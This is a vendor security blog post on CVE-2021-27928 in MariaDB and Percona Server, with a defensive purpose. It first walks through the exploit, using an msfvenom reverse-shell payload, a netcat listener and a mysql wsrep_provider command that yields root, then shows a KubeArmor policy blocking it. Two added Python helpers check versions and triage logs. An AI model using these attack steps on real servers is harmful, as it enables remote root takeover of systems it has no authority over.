Protecting Percona DB Server from CVE-2021-27928 – Accuknox
Introduction
Data is a critical asset of any company, and data protection is a critical component of business protection. Having a strong database security posture will enable you to protect your organization’s sensitive information from outsiders.
Every database faces different threats; here we look at an insider threat in which a malicious user exploits a remote code execution flaw in Percona PMM Server. We will first learn about the vulnerability and walk through the exploit itself, then see how we can protect against it.
Vulnerability Assessment
So, let us understand the vulnerability. Remote code execution is the core issue here. An untrusted search path leads to eval injection: a database user holding the SUPER privilege can execute OS commands after modifying the wsrep_provider and wsrep_notify_cmd variables. To reproduce this exploit, install any of the versions listed below.
Prerequisites:
- MariaDB 10.2 before 10.2.37, or 10.3 before 10.3.28, or 10.4 before 10.4.18, or 10.5 before 10.5.9
- Percona Server through 2021-03-03
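As an added check (not part of the original post), the function below classifies a server's `SELECT VERSION()` string against the MariaDB ranges quoted above; the cut-off table is taken from those ranges, and Percona Server, which the post lists by date rather than version, is not covered.

```python
# Added example, not from the AccuKnox post: classify a MariaDB VERSION()
# string against the affected ranges quoted above. Percona Server is listed
# by date ("through 2021-03-03") in the post, so it is not handled here.
FIRST_FIXED = {          # branch -> first release outside the affected range
    (10, 2): (10, 2, 37),
    (10, 3): (10, 3, 28),
    (10, 4): (10, 4, 18),
    (10, 5): (10, 5, 9),
}


def parse_version(version_string):
    """'10.4.17-MariaDB-1:10.4.17+maria~focal' -> (10, 4, 17)."""
    core = version_string.strip().split("-", 1)[0]   # drop the vendor suffix
    parts = core.split(".")
    if len(parts) < 3 or not all(p.isdigit() for p in parts[:3]):
        raise ValueError(f"unrecognised version string: {version_string!r}")
    return tuple(int(p) for p in parts[:3])


def is_affected(version_string):
    """True/False for the listed 10.x branches, None if the branch is not listed."""
    version = parse_version(version_string)
    fixed = FIRST_FIXED.get(version[:2])
    if fixed is None:
        return None          # e.g. 10.6+: not in the ranges the post quotes
    return version < fixed


if __name__ == "__main__":
    for sample in ("10.4.17-MariaDB-1:10.4.17+maria~focal", "10.4.18-MariaDB", "10.6.0"):
        print(sample, "->", is_affected(sample))
```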
The specific version has already been installed on our test machine, as you can see below. root@kali will be our victim machine.
[Screenshot: Percona Server version on the victim machine]
The Exploit
We will connect to another machine and then will start with the exploitation. host@h will be the attacker’s machine.
Step 1:
Let's create our reverse shell payload with msfvenom. For our payload we will use linux/x64/shell_reverse_tcp.
[NOTE] Change LHOST to your IP address.
host@h:~# msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.26.255.252 LPORT=8181 -f elf-so -o CVE-2021-27928.so
Step 2:
Now we will use Netcat to listen to the specified port.
host@h:~# nc -lvp 8181
listening on [any] 8181 ..
Step 3:
We will copy the payload to the victim machine. Here we will be using the Python HTTP server.
host@h:~# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)…
Step 4:
Now let us get into the victim machine and download the payload. To do that, just follow the commands below.
[Screenshot: download commands on the victim machine]
Step 5:
We will now execute the payload.
root@kali:~# mysql -u root -p -h 127.0.0.1 -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
Enter password: ERROR 2013 (HY000) at line
Now let us check our listener: we have successfully obtained root shell access.
[Screenshot: root shell on the attacker's listener]
Let us see how we can protect it using the KubeArmor security policy.
How to use KubeArmor on your VM
Below is a sample policy we are going to apply using KubeArmor. We also have sample policies for various workloads, curated by security experts. Check out the following link to view our other Policy Templates.
[Screenshot: KubeArmor policy vm-cve-2021-27928.yaml]
We will save the file as vm-cve-2021-27928.yaml. To apply a VM policy, just copy and paste the following command in your terminal.
karmor vm policy add vm-cve-2021-27928.yaml
root@kali:~# karmor vm policy add vm-cve-2021-27928.yaml
Success
Once the policy is applied let us execute the payload and see what happens.
[Screenshot: payload execution after the policy is applied]
With the policy in place, mysqld is not allowed to open the shared object referenced by wsrep_provider, so the payload never runs: no root shell is received on the attacker machine and the payload execution is terminated.
To check the logs, just copy-paste the following command in your terminal.
karmor log --json
[Screenshot: karmor log output]
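The script below is an added example, not part of the post or of KubeArmor itself: it triages `karmor log --json` output for mysqld trying to open a shared object from a world-writable directory, which is exactly what the wsrep_provider abuse above needs, and separates enforced (Block) events from audit-only ones. The alert field names are assumed to follow KubeArmor's alert schema, and the sample lines are constructed rather than captured from the post's machine.

```python
# Added example (not from the AccuKnox post): triage `karmor log --json`
# output for mysqld loading a .so from a world-writable directory.
# Field names (Source, Operation, Resource, Action, ...) are assumed to match
# KubeArmor's alert schema; the sample lines below are constructed.
import json

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def is_suspicious(alert):
    """mysqld opening a shared object from a directory anyone can write to."""
    resource = alert.get("Resource", "")
    return (
        alert.get("Operation") == "File"
        and alert.get("Source", "").endswith("mysqld")
        and resource.endswith(".so")
        and resource.startswith(WRITABLE_DIRS)
    )


def triage(lines):
    """Return (blocked, audit_only) lists of suspicious resource paths."""
    blocked, audit_only = [], []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            alert = json.loads(line)
        except json.JSONDecodeError:
            continue          # karmor mixes status text with the JSON stream
        if not is_suspicious(alert):
            continue
        target = blocked if alert.get("Action") == "Block" else audit_only
        target.append(alert["Resource"])
    return blocked, audit_only


# Constructed sample stream: one status line, one blocked load from /tmp,
# one legitimate Galera provider load, one audit-only load from /dev/shm.
SAMPLE = """\
gRPC server: localhost:32767
{"HostName":"kali","Type":"MatchedHostPolicy","PolicyName":"vm-cve-2021-27928","Source":"/usr/sbin/mysqld","Operation":"File","Resource":"/tmp/CVE-2021-27928.so","Action":"Block","Result":"Permission denied"}
{"HostName":"kali","Type":"HostLog","Source":"/usr/sbin/mysqld","Operation":"File","Resource":"/usr/lib/galera/libgalera_smm.so","Action":"Allow","Result":"Passed"}
{"HostName":"kali","Type":"MatchedHostPolicy","PolicyName":"vm-cve-2021-27928","Source":"/usr/sbin/mysqld","Operation":"File","Resource":"/dev/shm/x.so","Action":"Audit","Result":"Passed"}
"""

if __name__ == "__main__":
    blocked, audit_only = triage(SAMPLE.splitlines())
    print("blocked:", blocked)
    print("audit-only (policy not enforcing):", audit_only)
```

An audit-only hit means the policy saw the load but did not stop it, so check that the policy's action is Block before relying on it.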
Conclusion
In this blog, we have seen how a single unwanted permission on a variable in your DB could be abused to gain root access to your system. There are several other exploits that can be used against you when you're running an outdated version of any database. Hence the solution is to always keep your DB versions updated to the latest patch as soon as it's released by the vendor.
KubeArmor is a cloud runtime security tool by AccuKnox that makes detecting such vulnerabilities and containing them easier while manual updates are pending. To learn more about AccuKnox and its products, check out the links below.
KubeArmor website: https://kubearmor.io/
KubeArmor GitHub: https://github.com/kubearmor/KubeArmor
KubeArmor Slack: Join Us
Now you can protect your workloads in minutes using AccuKnox; it is available to protect your Kubernetes and other cloud workloads using kernel-native primitives such as AppArmor, SELinux, and eBPF.